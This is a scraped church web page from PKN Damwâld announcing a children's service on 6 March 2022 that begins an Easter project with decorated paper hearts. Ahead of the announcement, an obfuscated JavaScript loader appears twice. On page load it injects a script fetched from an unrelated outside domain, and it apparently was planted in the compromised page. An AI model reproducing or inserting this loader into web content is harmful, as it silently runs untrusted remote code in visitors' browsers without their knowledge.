;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Bernetsjerke/Kingkids - PKN Damwâld
6 maart 2022
09:30 t/m 10:30
Damwâld
Bernetsjerke/Kingkids

Beste jongens en meisjes,

Op 6 maart wordt iedereen extra uitgenodigd om in de kerk te komen. De leiding van de Bernetsjerke en de Kingkids gaan starten met jullie nieuwe paasproject. Ook de grote mensen gaan starten met hun veertigdagenproject. Omdat we allemaal met elkaar kerk zijn, willen we samen beginnen met een feestelijke dienst.
We hopen dat jullie samen met jullie ouders komen!
In de Paadwizer zijn harten bijgevoegd. Het zou prachtig zijn wanneer je die harten inkleurt of op een andere manier versierd. Tijdens de diensten tot en met Pasen hebben we het steeds over liefde voor elkaar.
Op zondag 6 maart mag je zelf een mooi plekje zoeken in de kerk om hem op te hangen. De harten blijven hangen tot Pasen, daarna mag je hem weer meenemen naar huis.
We hopen op heel veel harten!!!!!!!!!!!!!!!!!!!!
Succes.

Mochten er nog vragen zijn, ons mailadres is: bernetsjerke@gmail.com.

Locatie: DamwâldDamwâld